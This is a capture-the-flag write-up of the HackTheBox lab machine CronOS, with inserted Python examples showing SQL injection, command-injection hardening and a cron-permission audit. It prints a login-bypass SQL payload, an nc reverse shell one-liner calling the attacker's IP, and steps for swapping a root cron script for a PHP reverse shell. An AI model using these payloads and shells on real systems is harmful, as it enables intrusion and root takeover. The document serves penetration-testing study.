Another OSCP-like Box: CronOS

@ro0taddict
6 min read · Mar 1, 2021

This is my third writeup in the OSCP-like Boxes series.

CronOS, a HackTheBox machine at 10.10.10.13, is a Linux box that aims to help aspiring Penetration Testers practice Enumeration, SQL and Command Injection, and exploiting weak permissions on a Cron job.

Scanning and Enumeration

I normally start my enumeration with Nmap.

sudo nmap -T5 -n -vvv -oA initial-scan 10.10.10.13

Figure 1.0
  • -T5 is the fastest timing template. The default is -T3
  • -n disables DNS name resolution
  • -vvv increases the verbosity of the output
  • -oA saves the output in all of Nmap's output formats

Next, I performed a targeted scan on the open TCP ports using the default NSE scripts (-sC), version detection (-sV), and operating system detection (-O).

sudo nmap -sC -sV -O -p22,53,80 -oA targeted-scan 10.10.10.13

Figure 1.1

All TCP Port Scan

To confirm all open TCP ports, I used Masscan. Alternatively, Nmap's -p- option does the same job here.

sudo masscan -e tun0 -p1-65535 --interactive 10.10.10.13

Figure 1.2

UDP Scan

It’s a best practice to scan the UDP ports as well. I started with the most common ports since a full UDP scan takes a long time to finish.

sudo nmap -sU -sC --top-ports 20 -oA udp-top20 10.10.10.13

Figure 1.3

Based on my scans, I found that TCP ports 22, 80, and 53 are open.

Port 22

I continued my enumeration and looked for possible exploitation on port 22. Based on Figure 1.1, this is running OpenSSH 7.2p2. There are no major vulnerabilities for this version. Generally, I don't see any major vulnerability in SSH unless it's a very old version.

Port 80

I also browsed the web server, and it seemed to be running the default configuration.

Figure 1.4

Nikto

I ran Nikto to enumerate the web server, hoping to find anything useful.

nikto -h 10.10.10.13

Figure 1.5

Gobuster

I also used Gobuster to look for any exposed directories on the web server.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.13

Figure 1.6

Port 53

Nslookup

Since I didn't get any meaningful information on the web server, I then enumerated the DNS server.

nslookup 10.10.10.13 10.10.10.13

The first argument in this non-interactive Nslookup command is the name or IP address of the host to be looked up, while the second argument specifies the host name or address of the name server to query.

Figure 1.7

Based on Nslookup, I found out the cronos.htb domain name.

Exploitation

Since the DNS server is also listening on TCP, I then attempted a DNS zone transfer. I used Dig.

dig axfr @10.10.10.13 cronos.htb

Figure 1.8

I found additional hosts such as admin.cronos.htb. I then added cronos.htb, admin.cronos.htb, and ns1.cronos.htb to the /etc/hosts file in my Kali.

sudo nano /etc/hosts

Figure 1.9

SQL Injection

I checked admin.cronos.htb in a browser and noticed that it’s an authentication page. Common usernames and passwords did not work for this page.

Figure 2.0

I then tested the fields for SQL injection. I used this link for reference. I entered the common SQL injection payload below in both the username and the password fields, with a trailing space after “--”.

' OR '1'='1' --

Figure 2.1

I was able to bypass the authentication page and found a basic application that performs Traceroute and Ping commands.
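To show why that single quote and comment marker are enough to bypass the login, here is an added example (not code from the writeup or from the CronOS box) that reproduces the same bypass against a constructed SQLite users table, then shows the parameterized query that closes the hole. The table contents and credentials are made up for the demonstration.

```python
import sqlite3

# Constructed sample user table for demonstration; not data from the CronOS box.
SAMPLE_USERS = [("admin", "not-the-real-password"), ("alice", "hunter2")]

# The bypass string from the writeup, entered in both fields (trailing space after "--" kept).
BYPASS_PAYLOAD = "' OR '1'='1' -- "


def _open_demo_db():
    """Create an in-memory SQLite database with a small users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_login(username, password):
    """Login check built by string concatenation, the pattern behind the bypass.

    User-controlled text becomes part of the SQL grammar: the quote closes the
    literal, OR '1'='1' makes the WHERE clause always true, and -- comments
    out the rest of the statement, including the password comparison.
    """
    conn = _open_demo_db()
    query = ("SELECT COUNT(*) FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    row = conn.execute(query).fetchone()
    conn.close()
    return row[0] > 0


def safe_login(username, password):
    """Same check with bound parameters: the input is data, never SQL."""
    conn = _open_demo_db()
    row = conn.execute(
        "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    conn.close()
    return row[0] > 0


if __name__ == "__main__":
    print("concatenated query, bypass payload:", vulnerable_login(BYPASS_PAYLOAD, BYPASS_PAYLOAD))  # True
    print("parameterized query, bypass payload:", safe_login(BYPASS_PAYLOAD, BYPASS_PAYLOAD))      # False
    print("parameterized query, real credentials:", safe_login("alice", "hunter2"))                  # True
```

The parameterized version does not strip or escape anything; the database driver keeps the payload as a plain string value, so it simply matches no row. That is the fix the Key Takeaways point at when they say to apply mitigations for injection attacks.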

Figure 2.2

I then tested whether I could perform a command injection in this basic application. This link is a good reference for Command Injection attacks.

Figure 2.3

Based on the output, I was able to perform a Command Injection using the “|” (pipe) character.
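The pipe works because the application hands the user-supplied host to a shell as part of one command string. The following added example (my own illustration, not code from the writeup or from the CronOS application, whose source the post does not show) contrasts that pattern with a hardened handler that validates the target and builds an argv list so no shell ever interprets the input. The function names and the hostname rule are my assumptions.

```python
import ipaddress
import re

# Shell metacharacters that let a second command ride along with the host
# argument once the string reaches sh -c. "|" is the one used in the writeup.
SHELL_METACHARS = set("|;&`$()<>\n")

# Hostname rule assumed for this example: dot-separated labels of letters,
# digits and hyphens (RFC 1123 style), at most 253 characters overall.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)([a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.IGNORECASE,
)


def vulnerable_ping_command(host):
    """How an injectable app builds its command: one string meant for the shell.

    Anything after a metacharacter in `host` becomes a second command.
    """
    return "ping -c 1 " + host


def is_valid_target(host):
    """Accept only an IP address literal or a syntactically valid hostname."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return bool(HOSTNAME_RE.match(host))


def hardened_ping_command(host):
    """Validate the target first, then build an argv list (no shell involved).

    The returned list is what you would pass to subprocess.run(...) with
    shell=False; a stray "|" would just be an argument ping rejects.
    """
    if not is_valid_target(host):
        raise ValueError("invalid host: %r" % host)
    return ["ping", "-c", "1", host]


def detect_injection_attempt(host):
    """Detection-side view: flag submitted input containing shell metacharacters."""
    return any(ch in SHELL_METACHARS for ch in host)


if __name__ == "__main__":
    attempt = "10.10.10.13 | id"  # constructed sample input
    print("shell string built by the vulnerable app:", vulnerable_ping_command(attempt))
    print("flagged by the detector:", detect_injection_attempt(attempt))  # True
    print("hardened argv for a valid host:", hardened_ping_command("cronos.htb"))
```

Allow-listing the argument shape and avoiding the shell are complementary: the allow-list rejects the injection attempt up front, and the argv form means that even a validation bug cannot turn an argument into a second command.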

Reverse Shell

I then tried several reverse shell one-liners. I had success with the reverse shell one-liner from this Github link.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 4444 >/tmp/f

Listener

I ran a Netcat listener on port 4444.

sudo nc -nlvp 4444

Figure 2.4
Figure 2.5
Figure 2.6

I then had a non-interactive reverse shell on CronOS.

Post Exploitation

I upgraded my access to an interactive shell. Please refer to this link on how to upgrade your shell.

A good tool to use for Privilege Escalation is Linux Smart Enumeration by Diego Blanco. It can be downloaded from this Github link.

wget https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh

Figure 2.7

Host the file using SimpleHTTPServer

sudo python -m SimpleHTTPServer 80

Figure 2.8

I then changed to a directory where I had write permission and downloaded the tool using Wget.

cd /dev/shm
wget http://10.10.14.4/lse.sh

Figure 2.9

I ran the script using the following syntax.

bash lse.sh -i -l 1

Figure 3.0

Looking at the tool output, I noticed a Cron job that is not present on a default Linux host. I checked the permissions of the script and found that the root user created this Cron job, but the file itself is owned by www-data. Since www-data has full permission on /var/www/laravel/artisan, I simply replaced it with a reverse shell and got root access when the Cron job ran.

ls -l /var/www/laravel/artisan

Figure 3.1
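The misconfiguration here is easy to audit for: a root cron job that executes a file a lower-privileged user can change. The following added example (my own check, not part of the writeup or of the lse.sh tool) parses system-crontab lines, pulls out the absolute paths in each root job, and reports any that are owned by someone other than root or are group/world writable. The crontab text and the ownership table are constructed samples modelled on the situation the post describes, not copied from the box; swap in `live_stat_lookup` to run it against a real host.

```python
import os
import pwd
import re
import stat

# Constructed sample of a system crontab (the format with a user field, as in
# /etc/crontab and /etc/cron.d); this is not the CronOS box's actual crontab.
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* *     * * *   root    /usr/bin/php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
"""

# Constructed stand-in for os.stat(): path -> (owner name, permission bits).
SAMPLE_STAT = {
    "/usr/bin/php": ("root", 0o755),
    "/var/www/laravel/artisan": ("www-data", 0o755),
    "/etc/cron.hourly": ("root", 0o755),
}

# Five schedule fields, a user, then the command (@reboot-style lines are not handled).
CRON_LINE_RE = re.compile(r"^(\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")


def parse_system_crontab(text):
    """Yield (user, command) for each scheduling line, skipping comments and variables."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        m = CRON_LINE_RE.match(line)
        if m:
            yield m.group("user"), m.group("cmd")


def absolute_paths_in(command):
    """Return every token of the command that looks like an absolute path."""
    return [tok for tok in re.split(r"[\s;&|]+", command) if tok.startswith("/")]


def live_stat_lookup(path):
    """Real lookup for use on a host: (owner name, mode bits), or None if absent."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return pwd.getpwuid(st.st_uid).pw_name, stat.S_IMODE(st.st_mode)


def find_risky_cron_jobs(crontab_text, stat_lookup):
    """Report files run by a root cron job that a non-root user could modify.

    A path is flagged when the job runs as root but the file is owned by
    another user, or is writable by its group or by everyone.
    """
    findings = []
    for user, cmd in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        for path in absolute_paths_in(cmd):
            info = stat_lookup(path)
            if info is None:
                continue
            owner, mode = info
            writable_by_others = bool(mode & (stat.S_IWGRP | stat.S_IWOTH))
            if owner != "root" or writable_by_others:
                findings.append((path, owner, oct(mode)))
    return findings


if __name__ == "__main__":
    for path, owner, mode in find_risky_cron_jobs(SAMPLE_CRONTAB, SAMPLE_STAT.get):
        print("root cron job runs %s owned by %s (mode %s)" % (path, owner, mode))
```

On the sample data the only finding is /var/www/laravel/artisan owned by www-data, which is exactly the condition the writeup exploits. The remediation side of the Key Takeaways follows directly: files executed by root cron jobs should be owned by root and not writable by the service account.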

I looked for a PHP reverse shell script in Kali, changed the IP in the script to the IP of my Kali, and overwrote the Cron job file.

locate php-reverse-shell
cp /usr/share/laudanum/php/php-reverse-shell.php .

Figure 3.2

nano php-reverse-shell.php

I changed the IP in the script to 10.10.14.4, the IP of my Kali.

Figure 3.3

Host the file using SimpleHTTPServer and transfer it to CronOS.

python -m SimpleHTTPServer

Figure 3.4

wget http://10.10.14.4/php-reverse-shell.php

Figure 3.5

Listener

I set up another Netcat listener on port 8888, then copied php-reverse-shell.php to /var/www/laravel/artisan.

nc -nlvp 8888

Figure 3.6

cp php-reverse-shell.php /var/www/laravel/artisan

Figure 3.7

Root access!

Figure 3.8

Flags

Figure 3.9

Key Takeaways

  • Limit the information the DNS server provides; disable DNS zone transfers to untrusted servers.
  • Practice a secure SDLC when creating applications
  • Apply appropriate patches and mitigations for the different injection attacks
  • Implement proper file permissions
